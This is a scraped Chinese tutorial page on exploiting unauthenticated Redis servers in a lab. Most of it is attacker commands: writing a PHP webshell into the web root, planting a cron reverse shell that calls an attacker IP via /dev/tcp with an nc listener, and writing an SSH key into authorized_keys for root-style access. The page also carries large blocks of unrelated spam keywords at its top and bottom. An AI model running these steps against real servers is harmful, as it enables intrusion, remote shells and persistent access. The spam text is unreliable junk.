婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 關于Redis未授權訪問的問題

關于Redis未授權訪問的問題

熱門標簽:鄭州人工智能電銷機器人系統 山東外呼銷售系統招商 宿遷便宜外呼系統平臺 十堰營銷電銷機器人哪家便宜 貴州電銷卡外呼系統 日本中國地圖標注 超呼電話機器人 魔獸2青云地圖標注 北京400電話辦理收費標準

漏洞原理

Redis 默認情況下,會綁定在 0.0.0.0:6379,如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源 ip 訪問等,這樣將會將 Redis 服務暴露到公網上,如果在沒有設置密碼認證(一般為空)的情況下,會導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下,利用 Redis 自身的提供的config 命令,可以進行寫文件操作,攻擊者可以成功將自己的ssh公鑰寫入目標服務器的 /root/.ssh文件夾的authotrized_keys 文件中,進而可以使用對應私鑰直接使用ssh服務登錄目標服務器。

利用條件

  • redis綁定在 0.0.0.0:6379,且沒有進行添加防火墻規則避免其他非信任來源 ip 訪問等相關安全策略,直接暴露在公網
  • 沒有設置密碼認證(一般為空),可以免密碼遠程登錄redis服務

漏洞危害

  • 攻擊者無需認證訪問到內部數據,可能導致敏感信息泄露,黑客也可以惡意執行flushall來清空所有數據
  • 攻擊者可通過eval執行lua代碼,或通過數據備份功能往磁盤寫入后門文件
  • 最嚴重的情況,如果Redis以root身份運行,黑客可以給root賬戶寫入SSH公鑰文件,直接通過SSH登錄受害服務器

漏洞復現

搭建測試環境

受害機Ubuntu 20.04

  1. 安裝php:sudo apt install php7.4-cli libapache2-mod-php
  2. 安裝apache2:sudo apt install apache2 。并啟動apache服務:sudo service apache2 start
  3. 安裝redis,環境需要4.x/5.x以下的redis版本,這里下載3.2版本的,并解壓、編譯:
$ wget http://download.redis.io/releases/redis-3.2.11.tar.gz
$ tar -zxvf redis-3.2.11.tar.gz
$ cd redis-3.2.11
$ make

如果make 時遇到以下報錯,需要安裝gcc,并設置啟動參數:

錯誤信息如下:

/bin/sh: cc: command not found

解決辦法,安裝gcc:

sudo apt install gcc

然后設置make啟動參數后即可運行:

make MALLOC=libc

4.編譯完成后,進入src目錄下,復制redis-cliredis-server/usr/bin/目錄下:

$ cd src
$ sudo cp redis-cli redis-server /usr/bin/

5.回到redis-3.2.11目錄中,復制redis.conf文件到/etc/目錄下:

$ cd ..
$ sudo cp redis.conf /etc/

使用sudo vim /etc/redis.conf 編輯配置文件,將61行的IP注釋起來,表示外網可訪問,如下:


然后將80行的yes改為no,表示關閉保護模式,如下:


然后保存退出。

使用redis-server /etc/redis.conf啟動redis服務:

打開一個新的終端,在窗口使用redis-cli 命令,測試能否正常連接redis:

使用quit退出redis命令行,然后在Ubuntu終端中開啟ssh服務,確保后面能使用ssh進行連接:

$ sudo service ssh start

攻擊機Kali 2021.1

只要能連上redis即可,需要有redis-cli 命令,如果沒有redis,需要進行安裝:
bash $ sudo apt install redis-tools

利用redis寫入webshell

利用條件

  • 服務器開著web服務
  • redis有web目錄寫權限,可以往web路徑寫入文件

利用過程

測試使用Kali連接Ubuntu的redis服務:

$ redis-cli -h 192.168.101.6

如果成功連接上受害機,說明受害機存在redis未授權訪問漏洞。

redis可以寫入文件。使用config get dir 命令可以查看寫入文件的目錄,并且可以用來修改寫入文件的目錄。如下:


因為web服務無法訪問到/home目錄下的內容,所以需要修改redis保存文件的路徑,將其修改到網站的根目錄下,也就是 默認的 /var/www/html 目錄。因此redis需要具有對/var/www/html 寫入的權限,使用config set dir /var/www/html 來修改dir的值:

然后使用redis寫入文件:

$ config set dbfilename shell.php
$ set xxx "?php phpinfo(); ?>"
$ save

然而并不能寫入文件,結果如下:


具體原因是因為redis對web根目錄沒有寫入權限,這是一個比較重要的點,也是能否利用未授權訪問來getshell的因素之一。為了測試,此時需要手動在受害機網站根目錄中,新建一個其他用戶具有可寫入權限的文件夾,然后再將redis保存文件的dir值修改為新建文件夾的路徑:



此時再次進行寫入,可以看到已經保存成功了:

成功寫入文件后可以在受害機中進行查看:

現在在瀏覽器中訪問這個頁面試試:

從上面的訪問結果可以看出我們寫入的php代碼已經成功執行并返回。再次寫入文件,將一句話木馬寫入到目錄中:

訪問webshell頁面:

使用蟻劍連接webshell:

利用redis反彈shell

原理:在攻擊機上開啟nc反彈端口監聽,通過redis未授權訪問漏洞,寫入Linux定時計劃,反彈shell。

利用條件對/var/spool/cron文件夾有寫入權限

利用過程首先在攻擊機監聽一個端口:

$ nc -lvnp 6666

在攻擊機開啟新的命令行窗口,連接受害機的redis服務,然后執行下面的命令:

$ set x "\n\n\n* * * * * bash -i > /dev/tcp/192.168.101.8/6666 0>1\n\n\n"
$ config set dir /var/spool/cron/
$ config set dbfilename root
$ save

注意此處的計劃任務命令,如果在Ubuntu中,是無法反彈shell的,原因是因為ubuntu會將redis寫入的緩存亂碼當作命令來解釋,導致執行不成功。而centos不會對亂碼進行解釋,可以成功執行反彈shell的命令。

可以在受害機查看文件是否保存成功:

但是在ubuntu下無法反彈shell,這是由于redis向任務計劃文件里寫內容出現亂碼而導致的語法錯誤,而亂碼是避免不了的,centos會忽略亂碼去執行格式正確的任務計劃,而ubuntu并不會忽略這些亂碼,所以導致命令執行失敗,因為自己如果不使用redis寫任務計劃文件,而是正常向/etc/cron.d目錄下寫任務計劃文件的話,命令是可以正常執行的,所以還是亂碼的原因導致命令不能正常執行,而這個問題是不能解決的,因為利用redis未授權訪問寫的任務計劃文件里都有亂碼,這些代碼來自redis的緩存數據。

利用redis寫入ssh公鑰

利用條件受害機必須有~/.ssh文件夾,無論是普通用戶還是root用戶,否則無法在redis中設置dir的值

直接使用~/.ssh是不行的,需要絕對路徑。

另一個條件就是需要知道家目錄的名稱,比如上面的/home/unravel/.ssh,必須知道unravel

利用過程首先在攻擊機生成ssh公鑰,用于連接受害機時來使用私鑰驗證登陸:

$ ssh-keygen 

將公鑰開頭和結尾添加兩行換行,并存儲為新的文本文件,用于redis在連接時寫入的內容。添加兩個換行的原因是對redis緩存垃圾數據和公鑰的內容分隔開來,以免ssh連接失敗。可以使用bash命令來完成這個操作:

(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > key.txt

使用攻擊機連接受害機時寫入變量xx存儲攻擊機的公鑰:

cat key.txt | redis-cli -h 192.168.101.6 -x set x

使用攻擊機連接受害機redis,將寫入的文件路徑設置為/home/unravel/.ssh,并設置保存的文件名稱為authorized_keys

注意authorized_keys名稱是固定的,不能隨便改,否則連接不上ssh
bash $ config set dir /home/unravel/.ssh $ config set dbfilename authorized_keys $ save

然后在受害機文件中查看一下:

在攻擊機嘗試使用本地私鑰對受害機進行連接:

$ ssh unravel@192.168.101.6 -i ~/.ssh/id_rsa

總結

Redis在實戰中算是比較常用的端口利用了。除了反彈shell的方法在測試的時候沒有實現getshell以外,還有一種主從復制的方式,后面有空補上。
參考鏈接:https://paper.seebug.org/975/

到此這篇關于Redis未授權訪問的文章就介紹到這了,更多相關Redis未授權訪問內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Redis未授權訪問配合SSH key文件利用詳解
  • 關于Redis未授權訪問漏洞利用的介紹與修復建議
  • python腳本實現Redis未授權批量提權

標簽:臺州 楊凌 果洛 北京 江蘇 大慶 吉安 朝陽

巨人網絡通訊聲明:本文標題《關于Redis未授權訪問的問題》,本文關鍵詞  關于,Redis,未,授權,訪問,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《關于Redis未授權訪問的問題》相關的同類信息!
  • 本頁收集關于關于Redis未授權訪問的問題的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    成人午夜av影视| 欧美美女一区二区| 91在线视频播放地址| 精品久久久久一区| 蜜臀av亚洲一区中文字幕| 制服丝袜亚洲色图| 麻豆免费看一区二区三区| 久久蜜桃av一区二区天堂| 国产精华液一区二区三区| 国产精品丝袜一区| 99精品视频在线观看| 亚洲综合色区另类av| 91精品国产综合久久久久| 精品一区二区影视| 日本一区二区电影| 色综合av在线| 日韩va欧美va亚洲va久久| 制服丝袜一区二区三区| 免费欧美高清视频| 久久精品欧美日韩精品| 一本久久a久久免费精品不卡| 亚洲444eee在线观看| 亚洲午夜av在线| 欧美一级淫片007| 粉嫩久久99精品久久久久久夜 | 成人av一区二区三区| 日韩欧美亚洲另类制服综合在线| 美女www一区二区| 日韩欧美中文字幕精品| 国产成人精品免费一区二区| 国产欧美精品一区| 蓝色福利精品导航| 亚洲精品免费播放| 日韩精品一区二区三区在线观看| www.亚洲色图.com| 美女www一区二区| 中文字幕亚洲电影| 久久影音资源网| 欧美伊人久久大香线蕉综合69| 国产毛片精品国产一区二区三区| 亚洲精品一线二线三线| 欧美亚洲日本一区| 国产成人av电影| 日本午夜精品一区二区三区电影| 欧美国产成人精品| 欧美一区二区三区公司| av日韩在线网站| 538在线一区二区精品国产| 国产激情视频一区二区在线观看| 夜夜亚洲天天久久| 国产欧美精品日韩区二区麻豆天美| 欧美高清www午色夜在线视频| 国产一区二区三区蝌蚪| 亚洲va欧美va天堂v国产综合| 亚洲欧美aⅴ...| 久久久久久久精| 久久一二三国产| 一本一道久久a久久精品综合蜜臀 一本一道综合狠狠老 | 国产精品免费看片| 香港成人在线视频| 一区二区理论电影在线观看| 亚洲婷婷国产精品电影人久久| 国产在线精品不卡| 久久久久国产一区二区三区四区 | 一本色道久久综合精品竹菊| 久久久www免费人成精品| 亚洲成人在线观看视频| 成人精品电影在线观看| 精品国产一区二区三区久久久蜜月 | 亚洲成人精品一区二区| 久久亚洲一区二区三区明星换脸| 69成人精品免费视频| 欧洲色大大久久| 91官网在线免费观看| 91网站最新地址| 不卡的av电影| 国产精品亚洲一区二区三区妖精 | 亚洲国产成人一区二区三区| 国产精品女同一区二区三区| 综合色中文字幕| 老司机精品视频线观看86| 精品一区二区三区视频在线观看 | 日日夜夜一区二区| 一区二区三区小说| 久久超级碰视频| 日韩欧美中文一区二区| 日韩国产欧美在线播放| 欧美色网站导航| 欧美岛国在线观看| 9i在线看片成人免费| 欧美一区二区三区在| 亚洲激情自拍偷拍| 中文字幕精品在线不卡| 日韩午夜av电影| 久久不见久久见中文字幕免费| 国产99久久久精品| 成人av小说网| 精品污污网站免费看| 亚洲精品一线二线三线| 国产精品视频看| 亚洲综合男人的天堂| 亚洲午夜久久久久久久久电影院 | 亚洲图片欧美视频| 国产欧美一区二区精品性色 | 亚洲欧洲日韩在线| 亚洲伦理在线精品| 婷婷国产v国产偷v亚洲高清| 亚洲日穴在线视频| 美女高潮久久久| 色狠狠综合天天综合综合| 日韩亚洲欧美综合| 日韩中文字幕一区二区三区| 不卡的av电影| 91精品国产福利| 欧美一级二级在线观看| 一区二区欧美视频| 国产在线精品一区二区不卡了 | 亚洲一区二区成人在线观看| 日日摸夜夜添夜夜添亚洲女人| 精品一区二区在线视频| 国产精品一品二品| 亚洲高清免费在线| 国产传媒欧美日韩成人| 91麻豆成人久久精品二区三区| 日韩欧美国产精品一区| 亚洲综合av网| 欧美色精品天天在线观看视频| 国产日韩欧美一区二区三区综合| 日韩精品亚洲专区| 欧美精选在线播放| 亚洲一区免费观看| 94色蜜桃网一区二区三区| 国产精品盗摄一区二区三区| 国产一区视频导航| 91丨国产丨九色丨pron| 久久久精品一品道一区| 麻豆一区二区三| 欧美日韩国产bt| 亚洲在线视频一区| 91在线国内视频| 国产女同性恋一区二区| 韩国成人精品a∨在线观看| 欧美日韩精品综合在线| 国产精品高清亚洲| 国产电影一区在线| 日韩欧美国产午夜精品| 亚洲成人福利片| 在线免费观看日本欧美| 日韩毛片高清在线播放| 岛国一区二区三区| 国产亚洲欧美在线| 国产一区二区美女诱惑| 久久视频一区二区| 韩国理伦片一区二区三区在线播放| 丁香桃色午夜亚洲一区二区三区| 久久精品999| 久久久久久**毛片大全| 不卡区在线中文字幕| 亚洲人成亚洲人成在线观看图片| 色哟哟欧美精品| 五月天欧美精品| 精品国产91洋老外米糕| eeuss国产一区二区三区| 一区二区在线观看免费视频播放| 欧美精品乱人伦久久久久久| 国产精品综合二区| 亚洲综合视频在线观看| 精品国产网站在线观看| 色婷婷综合五月| 精品在线亚洲视频| 成人av午夜影院| 亚洲欧美日本在线| 欧美va亚洲va香蕉在线| av资源网一区| 另类的小说在线视频另类成人小视频在线| 久久久精品综合| 在线免费视频一区二区| 国产一区二区三区高清播放| 亚洲丝袜美腿综合| 国产成人免费视频一区| 精品一区二区三区在线视频| 精品欧美乱码久久久久久1区2区| 丝袜诱惑亚洲看片| 欧美色偷偷大香| 蜜芽一区二区三区| 国产欧美一区二区三区网站| 一本久久精品一区二区| 亚洲自拍都市欧美小说| 久久综合五月天婷婷伊人| 久久久久久久电影| 国产精品123| 蜜臀久久99精品久久久久宅男| 国产精品福利影院| 欧美精品一区二区久久久| 欧美日韩一区小说| 99re8在线精品视频免费播放| 国模娜娜一区二区三区| 日韩精品免费专区| 五月婷婷久久综合| 亚洲人成精品久久久久久 |